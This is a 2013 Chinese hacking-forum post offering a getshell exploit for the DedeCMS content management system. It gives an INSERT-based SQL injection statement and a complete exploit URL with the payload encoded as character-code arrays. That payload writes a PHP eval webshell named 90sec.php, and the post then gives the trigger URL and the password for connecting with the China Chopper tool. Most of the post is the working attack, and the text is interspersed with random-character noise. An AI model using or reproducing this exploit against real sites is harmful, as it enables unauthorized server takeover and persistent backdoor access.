找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2611|回复: 0
打印 上一主题 下一主题

dedecms漏洞getshell EXP最新

[复制链接]
跳转到指定楼层
楼主
发表于 2013-6-10 16:49:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
本帖最后由 土豆 于 2013-6-10 14:41 编辑 2 t2 k8 W0 U7 a+ H
" |2 H0 X! d+ R4 F

$ ^+ t! B) ^& G+ A* a% r2 b作者:鬼哥
& ]6 n2 F; c7 l% @; t3 `0 ~0 i" ~+ i. t9 }1 y! I
看贴不回,没JJ
* ?" e) d* x* v5 G2 |& X% s0 m5 T  ]1 p
漏洞大家都知道是哪个。) V' _3 O) d) M9 ?

: d. q9 L. {9 z7 g其实我一直在玩。。郁闷 虽然这个漏洞不是我第一个发现的,以前也是朋友告诉我。
9 f+ L" D7 V. Y+ p" U; ~, r3 q8 N' p; ], S  J( A9 D
但是没公开。我承认想自己留着玩。。以前这个漏洞应该很多人知道没发出来而已。9 E: n* B' z! P

+ o2 R. W, I( p" A刚看了出的几个exp .. 进后台。还得找后台路径 太麻烦了吧?) n" h6 ?! r  Q7 w4 i! z. h

# {4 _$ r/ H: n7 ~7 agetshell 很容易 。 既然刚发出来的是 sql方法getshell  我也看到几个人发了sql增加表mytag的内容。7 h8 E; l. P& P$ V3 c7 _
! {1 c% `2 S! M: s& o
但是测试了下。。失败
3 m- s" |- s+ ~
8 o0 j% ]# S6 E# ^3 _( l9 p原因: 用的语句是update  很多站 mytag 里面都没内容。那么你用update 那有什么用 修改不了任何数据。只能用 INSERT 当然,语句带#就会暴  错误。。现在要做的饶过即可。以前也出过那么多dede sql 结合饶过,成功INSERT。. c- ~. J' I4 g3 V/ E) P3 V
; q) j- G' }2 K& ?
构造语句:mytag` (aid,expbody,normbody) VALUES(9013,@`\'`,'{dede:php}file_put_contents(''90sec.php'',''<?php eval($_POST[guige]);?>'');{/dede:php}') # @`\'`( k! p7 L+ A) l! v4 i) Z

  o; {" a: H' k" @3 zEXP:
" j. p" c2 i3 r1 O
- x7 ^' l  p* `/ L4 Z/ ^4 Rhttp://www.xxx.com/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=967 Q( L8 w" S) N( B. X8 ^

0 b. E9 C! m0 Z
$ X5 Z( G0 I3 l" b( ?+ s& W成功增加。
: ?* ]5 X) v0 f$ K$ i
8 c3 E; }) c8 t( t. D1 q+ n0 j  P访问http://www.xxx.com/plus/mytag_js.php?aid=9013
1 }3 ^7 K2 ^, f: O) x生成一句话木马./ L4 M; m8 v$ s. p
菜刀连接 http://www.xxx.com/plus/90sec.php  密码 guige
+ Q( E1 [4 {  O! B0 c) k+ Y
% C& S# o* P4 ?7 j: B; N测试OK。
/ h) k$ d  c$ y6 `& Q  i/ A3 D* G" s8 `- @! V
* C" ]$ b6 o' M# n5 n
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表